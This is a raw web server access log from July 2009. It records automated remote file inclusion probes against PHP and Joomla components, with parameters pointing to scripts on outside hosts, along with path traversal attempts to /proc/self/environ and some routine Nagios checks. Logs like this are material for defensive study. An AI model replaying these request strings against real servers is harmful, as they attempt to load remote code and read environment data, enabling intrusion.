89.171.190.110 - - [06/Jul/2009:06:08:54 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
89.171.190.110 - - [06/Jul/2009:06:08:54 -0400] "GET /phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
89.171.190.110 - - [06/Jul/2009:06:08:54 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:09:26 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:09:26 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:09:26 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:06:09:49 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
217.125.38.117 - - [06/Jul/2009:06:10:16 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:10:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [06/Jul/2009:06:11:17 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:06:11:17 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:06:11:18 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:06:11:30 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
84.201.208.50 - - [06/Jul/2009:06:11:38 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:11:40 -0400] "GET //classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:11:41 -0400] "GET /logs/access_log.Q109051400//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:11:41 -0400] "GET /logs//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:11:55 -0400] "GET /logs/access_log.Q109052400//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:06:12:35 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:06:12:45 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.206.120.187 - - [06/Jul/2009:06:12:54 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.206.120.187 - - [06/Jul/2009:06:12:54 -0400] "GET /logs/access_log.Q109050800///?_SERVER[DOCUMENT_ROOT]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.206.120.187 - - [06/Jul/2009:06:12:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 200 8392 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:14:44 -0400] "GET /logs/access_log.Q109061000//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 337 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:15:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.198.22.248 - - [06/Jul/2009:06:16:18 -0400] "GET /logs/error_log.Q109060100/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
217.70.32.2 - - [06/Jul/2009:06:18:03 -0400] "GET /logs/access_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:06:18:19 -0400] "GET /logs/access_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
98.116.62.213 - - [06/Jul/2009:06:18:50 -0400] "GET /logs/access_log.Q109060200%20%20//?view=page&pagename=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:06:19:23 -0400] "GET /logs/error_log.Q109060400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.206.120.187 - - [06/Jul/2009:06:19:32 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.206.120.187 - - [06/Jul/2009:06:19:32 -0400] "GET /logs/access_log.Q109050800///?_SERVER[DOCUMENT_ROOT]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.206.120.187 - - [06/Jul/2009:06:19:32 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 200 8392 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:06:19:54 -0400] "GET /logs/error_log.Q109060400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
98.116.62.213 - - [06/Jul/2009:06:20:11 -0400] "GET /logs/access_log.Q109061100%20%20//?view=page&pagename=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:20:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.3.136 - - [06/Jul/2009:06:21:48 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.231.3.136 - - [06/Jul/2009:06:21:48 -0400] "GET /logs/access_log.Q109061700/?_SERVER[DOCUMENT_ROOT]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.231.3.136 - - [06/Jul/2009:06:21:48 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.231.3.136 - - [06/Jul/2009:06:21:49 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.231.3.136 - - [06/Jul/2009:06:21:49 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.231.3.136 - - [06/Jul/2009:06:21:49 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.231.3.136 - - [06/Jul/2009:06:21:49 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 409 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:21:49 -0400] "GET /logs/access_log.Q109061700/?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 225 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:21:49 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 8386 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:21:50 -0400] "GET /logs/access_log.Q109061700/?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:21:50 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:21:50 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8386 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:22:13 -0400] "GET /logs/access_log.Q109060400/?_SERVER[DOCUMENT_ROOT]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.231.3.136 - - [06/Jul/2009:06:22:14 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.231.3.136 - - [06/Jul/2009:06:22:14 -0400] "GET /logs/access_log.Q109060400/?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 225 "-" "XXXXXX"
222.231.3.136 - - [06/Jul/2009:06:22:15 -0400] "GET /logs/access_log.Q109060400/?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "XXXXXX"
61.78.62.84 - - [06/Jul/2009:06:22:35 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:22:35 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:22:36 -0400] "GET //modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:22:39 -0400] "GET //modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:22:39 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:22:39 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:23:13 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.45.176.74 - - [06/Jul/2009:06:23:33 -0400] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.45.176.74 - - [06/Jul/2009:06:23:33 -0400] "GET /logs/access_log.Q109062700%20%20/administrator/components/com_moofaq/css/file_includer.php?file=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.45.176.74 - - [06/Jul/2009:06:23:33 -0400] "GET /logs/administrator/components/com_moofaq/css/file_includer.php?file=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:23:36 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:23:37 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:23:37 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:23:37 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:23:41 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:24:41 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:24:41 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:24:41 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:24:44 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:25:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [06/Jul/2009:06:26:44 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:06:26:45 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:06:26:45 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:06:26:47 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:06:26:48 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:06:26:48 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:06:26:49 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:06:26:50 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:06:26:56 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:26:56 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:42 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:42 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:42 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:42 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:42 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:42 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:44 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:44 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:44 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:46 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:47 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:27:49 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.221.80.19 - - [06/Jul/2009:06:28:14 -0400] "GET //viewbody.html?code=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.0" 404 212 "-" "Mozilla/5.0"
66.221.80.19 - - [06/Jul/2009:06:28:14 -0400] "GET /logs//viewbody.html?code=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.0" 404 217 "-" "Mozilla/5.0"
66.221.80.19 - - [06/Jul/2009:06:28:16 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:32 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:32 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:33 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:38 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:48 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:48 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:48 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:06:28:49 -0400] "GET /logs/error_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:28:54 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:29:02 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:06:29:05 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:29:37 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:29:38 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:29:39 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:29:40 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:06:29:42 -0400] "GET /logs/error_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.100.5.136 - - [06/Jul/2009:06:29:43 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.100.5.136 - - [06/Jul/2009:06:29:43 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.100.5.136 - - [06/Jul/2009:06:29:43 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:29:57 -0400] "GET /logs/access_log.Q109061600%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
80.190.246.41 - - [06/Jul/2009:06:29:57 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
80.190.246.41 - - [06/Jul/2009:06:29:57 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
